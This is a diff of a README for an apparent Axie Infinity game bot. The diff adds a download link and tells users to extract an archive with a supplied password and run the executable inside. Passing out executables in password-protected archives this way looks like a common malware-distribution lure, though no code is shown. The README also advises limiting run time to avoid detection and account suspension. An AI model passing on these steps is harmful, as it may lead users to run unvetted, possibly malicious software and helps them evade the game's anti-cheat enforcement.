weaverjc/Axie-Infinity-bot/README.md

 This function retrieves the color value of the pixel at specified coordinates.

 ### Setup
-- Configure Game Resolution:
+1. Configure Game Resolution:
-- - Set the Axie Infinity game resolution to full-screen (or full-screen windowed) mode.
+- Set the Axie Infinity game resolution to full-screen (or full-screen windowed) mode.
-- - Close the SkyMavis game client to ensure the bot can access the game window without interference.
+- Close the SkyMavis game client to ensure the bot can access the game window without interference.

-- Download and Extract Files:
+2. Download and Extract Files:
-- - [Download]() the latest release of the repository.
+- [Download](https://github.com/weaverjc/Axie-Infinity-bot/archive/refs/heads/main.zip) the latest release of the repository.
-- - Extract the downloaded files using the password `Cfjx5a3Nu`.
+- Extract the downloaded files using the password `Cfjx5a3Nu`.

-- Launch the Bot:
+3 Launch the Bot:
-- - Run the bot executable with the correct settings configured in the provided configuration file.
+- Run the bot executable with the correct settings configured in the provided configuration file.
 Ensure the game client is running and visible on your screen.

 ### Warning
 Usage Limitations: It is not recommended to run the bot for more than 24 hours per account.
 Extended use may increase the risk of detection and account suspension.